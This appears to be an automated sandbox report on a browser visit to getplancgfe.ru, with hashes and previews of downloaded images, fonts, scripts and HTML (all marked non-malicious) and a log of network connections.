                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 100 x 35, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.035372245524405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPlpct/cTAkxl/k4E08up:6v/lhPot/k7Tp
                                                                                        MD5:C60E583F6E0BA715A7D50581BF1768B9
                                                                                        SHA1:2B83E430D125C3FFBB966A647F5DBDC5714101CA
                                                                                        SHA-256:CFD7749689008B63A44F3FBBB2C131BA7908213EF1D4C31894A975D19484BD46
                                                                                        SHA-512:2806E04FFD7C73E54431460BF76789CCAB5D0F549ED873BC0781A5BA9432996404A16602E310BD2C882EC0A6D63436CF18EB2BACC4CE8915307CBBA68DACA528
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...d...#.......8.....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):24057
                                                                                        Entropy (8bit):7.954226601544813
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:BZkkRn9hFBxzz4MO4JMCcpycl+CjCoQwCBRhAe05DVg8d2SvE6pR+gT/Lx5GLCC6:D5n9f4s+cCjVQxBRJ0L21EnC+5C60wNv
                                                                                        MD5:0CF643433F590DC8C0A8BB799E803850
                                                                                        SHA1:93AB58829D63697E19D87F57F660D6E04707CEA6
                                                                                        SHA-256:310847BC8C92E108A5168AED964B0B498F3EE67AD52984918796689155BBBF56
                                                                                        SHA-512:A7E89A14177D1D3C4B0E1ACF564B4275CA92802D57FC02364260C11E0DD454A98F9E4DC95EACBA17232A600F2699389740B751A7A3F5A5C2CECF9856FFFC0B38
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://th.bing.com/th/id/OIP.IQKceIaBL-BBjCJVeXr3RwHaE8
                                                                                        Preview:......JFIF.............BExif..MM.*.......i................@........^..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......<...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...3IEjd-%.S...J@-- ...N......)(...).....R.A.H)3H.4...b..i..@.......sE6..1sH(....\.E-..QJ..........!..A.&.M....l.5.4g&.`4.NiM..%(4.P....S.....Z.!..R.OJJ.))i(.Q@......@6.Q@.1h..@%%..@.KIE.Fh..-G.....p{QZ.l.G.....b)........J.....q...@.(.kzR.oCL....%.-...@...IN....ZJB.....Hh..4R..(...8..tS.Hi.J(...(....B.Q
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 156532, version 773.256
                                                                                        Category:downloaded
                                                                                        Size (bytes):156532
                                                                                        Entropy (8bit):7.996386572265519
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:HrPC5zUBeCGcReONEpKZZbwEPvdThY0E2eXOtr9pVhw+J3E6gbzlPAzJ+Zn+PMY6:TC5oNnZbwC9Wie+B9pVSeE6dMZnaBi
                                                                                        MD5:D465BCCB9EDF0873F021F66D4B09D89C
                                                                                        SHA1:214F3C71DE28C682602AECD39E9AD2BBA15F1B0C
                                                                                        SHA-256:F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
                                                                                        SHA-512:35D7523F48386E89B1CAD6A47DF65D64415AB9C45E6425BB4AB25AC9510F6D2E9DE3D7CAD79C2491660E885D7A38D3FFA9E93EB50AE045FBD072DEAF114E10B8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2
                                                                                        Preview:wOF2......ct.......A..c(.........................6.$. .`..<......\.@..m. % ....PX.....6.F.h.....^.......f%.....*..~.....W.........7...../.....?.....q...i........h..s'@.I...D...V.F.)(V..`.7.B....u....J...I.U..9E..`M...Zf......R.&.t&&.j....-..$...";.:...9... .3;...8...j%.'.@....>=.Hbdj..W.@.<].'7..`..tja~.X.<<....O..@./)x."A..6.....A..V+...^.t[p.a.A............N.>ilUN.@ek..^ .U.%....E ...pz&..M..^5TWwAc.d.....C......6Y...y...e../f.P..:...v..._B..zBOO.......f7cv....;.\..`:.1. .bHZ.."E.T$E.5iE...y.e..)."..m...Cz{..Yr....?ij....W.UH.....P@w...h.:.."..I+..DR.-(Q....4r...(.R;HCg8.aw{.I..c8..,{..L.5......R..g.{.g.'..<...........X....G.H$E..(0H.).A..e.B..).2O.l..2..Z....I.g...L9Hr..y~...\......4...x.....x.&.!?....M&ix..E....7.'):K..l.R.......K.%R .x.m...f..Wr...)...{.....n9W.........=H....5J.=b...$BT.Q....$`.....3..UT..<....K..KM$._O.S....a........p....%S8.S.Na.....2.F.U.\.....|.._.h.;.}L.....Y.Z..!..S.N.*EG]..<_k.Y.}.!t/.<U.....:......P`B..4.B......
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):24057
                                                                                        Entropy (8bit):7.954226601544813
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:BZkkRn9hFBxzz4MO4JMCcpycl+CjCoQwCBRhAe05DVg8d2SvE6pR+gT/Lx5GLCC6:D5n9f4s+cCjVQxBRJ0L21EnC+5C60wNv
                                                                                        MD5:0CF643433F590DC8C0A8BB799E803850
                                                                                        SHA1:93AB58829D63697E19D87F57F660D6E04707CEA6
                                                                                        SHA-256:310847BC8C92E108A5168AED964B0B498F3EE67AD52984918796689155BBBF56
                                                                                        SHA-512:A7E89A14177D1D3C4B0E1ACF564B4275CA92802D57FC02364260C11E0DD454A98F9E4DC95EACBA17232A600F2699389740B751A7A3F5A5C2CECF9856FFFC0B38
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:......JFIF.............BExif..MM.*.......i................@........^..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......<...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...3IEjd-%.S...J@-- ...N......)(...).....R.A.H)3H.4...b..i..@.......sE6..1sH(....\.E-..QJ..........!..A.&.M....l.5.4g&.`4.NiM..%(4.P....S.....Z.!..R.OJJ.))i(.Q@......@6.Q@.1h..@%%..@.KIE.Fh..-G.....p{QZ.l.G.....b)........J.....q...@.(.kzR.oCL....%.-...@...IN....ZJB.....Hh..4R..(...8..tS.Hi.J(...(....B.Q
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 156532, version 773.256
                                                                                        Category:downloaded
                                                                                        Size (bytes):156532
                                                                                        Entropy (8bit):7.996386572265519
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:HrPC5zUBeCGcReONEpKZZbwEPvdThY0E2eXOtr9pVhw+J3E6gbzlPAzJ+Zn+PMY6:TC5oNnZbwC9Wie+B9pVSeE6dMZnaBi
                                                                                        MD5:D465BCCB9EDF0873F021F66D4B09D89C
                                                                                        SHA1:214F3C71DE28C682602AECD39E9AD2BBA15F1B0C
                                                                                        SHA-256:F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
                                                                                        SHA-512:35D7523F48386E89B1CAD6A47DF65D64415AB9C45E6425BB4AB25AC9510F6D2E9DE3D7CAD79C2491660E885D7A38D3FFA9E93EB50AE045FBD072DEAF114E10B8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2
                                                                                        Preview:wOF2......ct.......A..c(.........................6.$. .`..<......\.@..m. % ....PX.....6.F.h.....^.......f%.....*..~.....W.........7...../.....?.....q...i........h..s'@.I...D...V.F.)(V..`.7.B....u....J...I.U..9E..`M...Zf......R.&.t&&.j....-..$...";.:...9... .3;...8...j%.'.@....>=.Hbdj..W.@.<].'7..`..tja~.X.<<....O..@./)x."A..6.....A..V+...^.t[p.a.A............N.>ilUN.@ek..^ .U.%....E ...pz&..M..^5TWwAc.d.....C......6Y...y...e../f.P..:...v..._B..zBOO.......f7cv....;.\..`:.1. .bHZ.."E.T$E.5iE...y.e..)."..m...Cz{..Yr....?ij....W.UH.....P@w...h.:.."..I+..DR.-(Q....4r...(.R;HCg8.aw{.I..c8..,{..L.5......R..g.{.g.'..<...........X....G.H$E..(0H.).A..e.B..).2O.l..2..Z....I.g...L9Hr..y~...\......4...x.....x.&.!?....M&ix..E....7.'):K..l.R.......K.%R .x.m...f..Wr...)...{.....n9W.........=H....5J.=b...$BT.Q....$`.....3..UT..<....K..KM$._O.S....a........p....%S8.S.Na.....2.F.U.\.....|.._.h.;.}L.....Y.Z..!..S.N.*EG]..<_k.Y.}.!t/.<U.....:......P`B..4.B......
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):24057
                                                                                        Entropy (8bit):7.954226601544813
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:BZkkRn9hFBxzz4MO4JMCcpycl+CjCoQwCBRhAe05DVg8d2SvE6pR+gT/Lx5GLCC6:D5n9f4s+cCjVQxBRJ0L21EnC+5C60wNv
                                                                                        MD5:0CF643433F590DC8C0A8BB799E803850
                                                                                        SHA1:93AB58829D63697E19D87F57F660D6E04707CEA6
                                                                                        SHA-256:310847BC8C92E108A5168AED964B0B498F3EE67AD52984918796689155BBBF56
                                                                                        SHA-512:A7E89A14177D1D3C4B0E1ACF564B4275CA92802D57FC02364260C11E0DD454A98F9E4DC95EACBA17232A600F2699389740B751A7A3F5A5C2CECF9856FFFC0B38
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://th.bing.com/th/id/OIP.IQKceIaBL-BBjCJVeXr3RwHaE8
                                                                                        Preview:......JFIF.............BExif..MM.*.......i................@........^..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......<...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...3IEjd-%.S...J@-- ...N......)(...).....R.A.H)3H.4...b..i..@.......sE6..1sH(....\.E-..QJ..........!..A.&.M....l.5.4g&.`4.NiM..%(4.P....S.....Z.!..R.OJJ.))i(.Q@......@6.Q@.1h..@%%..@.KIE.Fh..-G.....p{QZ.l.G.....b)........J.....q...@.(.kzR.oCL....%.-...@...IN....ZJB.....Hh..4R..(...8..tS.Hi.J(...(....B.Q
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (52276)
                                                                                        Category:downloaded
                                                                                        Size (bytes):102526
                                                                                        Entropy (8bit):4.781903903660331
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:vwMCMPMCMjMCM4MCMwMCM3sVMX709gbPMfjSFOTyPG9ZpgmLCq:P709gMGFiyPG9ZimLCq
                                                                                        MD5:C43CD173EEEBA2F72AA6B431D06B8C07
                                                                                        SHA1:427A692F7F39EABB3D5B8510AEE2743025DAF813
                                                                                        SHA-256:C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
                                                                                        SHA-512:02F6F6422B83104BC1E1B64961D7EDDA63635528417ED2DD3C6F0527457B8AB4CB43C528D2A70FC61E0F96AEC6E6D1A6D2B53ED523E1568B6D78BA41111C1393
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                                        Preview:/*!. * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):7499
                                                                                        Entropy (8bit):4.727898659769114
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:DV7EFKjyAkICVd1gY9uhaznjQ55LJmojBY:J7EF5IC2muhazYJPBY
                                                                                        MD5:464BC9E64D53E2C98DD13D0DDF6EA834
                                                                                        SHA1:A1C2775A02B06B06687D303BF9D5987E319D5660
                                                                                        SHA-256:977BD0ACC4531AE91A8E89E44B1175C9B44E6DEC2F2AC02C15357F02D071E165
                                                                                        SHA-512:29AFBC9E1B829640099B20534E9372505520621DA15EC759799A499860718F700DCE3E240979C544818DDB3826A4E5C836C324A66AA3C37989A5B9C159280D7B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Ultimate Supercar League - getplancgfe.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top">.. <div class="container">.. <a class="navbar-brand fw-bold" href="https://getplancgfe.ru//">.. <i class="fas fa-car"></i> Ultimate Supercar League - AutoShowroom.. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">.. <span class
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47671)
                                                                                        Category:downloaded
                                                                                        Size (bytes):47672
                                                                                        Entropy (8bit):5.401921124762015
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                        MD5:B804BCD42117B1BBE45326212AF85105
                                                                                        SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                        SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                        SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):1249
                                                                                        Entropy (8bit):5.242453121762845
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:hYYIzD6yJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6Kj2CZLY5Mc6NDLYzkYKLlOM
                                                                                        MD5:F58515DFE987F7E027C8A71BBC884621
                                                                                        SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                                                                        SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                                                                        SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://getplancgfe.ru/favicon.ico
                                                                                        Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                                                                        No static file info
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 1, 2024 13:45:46.579471111 CET49675443192.168.2.4173.222.162.32
                                                                                        Nov 1, 2024 13:45:47.445245028 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:47.445283890 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:47.445346117 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:47.445528984 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:47.445564985 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:47.445606947 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:47.445888042 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:47.445900917 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:47.446193933 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:47.446206093 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.296623945 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.296957970 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.296994925 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.298168898 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.298233986 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.299459934 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.299554110 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.299766064 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.299782991 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.306389093 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.306663036 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.306726933 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.307799101 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.307885885 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.308223009 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.308306932 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.361141920 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.362528086 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.362543106 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.409113884 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.569967985 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.620970011 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.621006012 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.625955105 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.626085997 CET44349736172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:48.626178026 CET49736443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.629206896 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:48.671339035 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:49.033706903 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:49.037018061 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:49.037055016 CET44349735172.217.18.3192.168.2.4
                                                                                        Nov 1, 2024 13:45:49.037112951 CET49735443192.168.2.4172.217.18.3
                                                                                        Nov 1, 2024 13:45:49.058720112 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:45:49.063575029 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:45:49.063636065 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:45:49.063973904 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:45:49.068720102 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:45:50.523804903 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:50.523874044 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:50.524070978 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:50.524593115 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:50.524605036 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.187299013 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:51.187356949 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.187561989 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:51.190543890 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:51.190558910 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.389832020 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.390662909 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:51.390708923 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.391874075 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.391932011 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:51.394685984 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:51.394813061 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.439130068 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:51.439162970 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:45:51.485558987 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:45:52.084361076 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.084443092 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.088886023 CET49741443192.168.2.4184.28.90.27
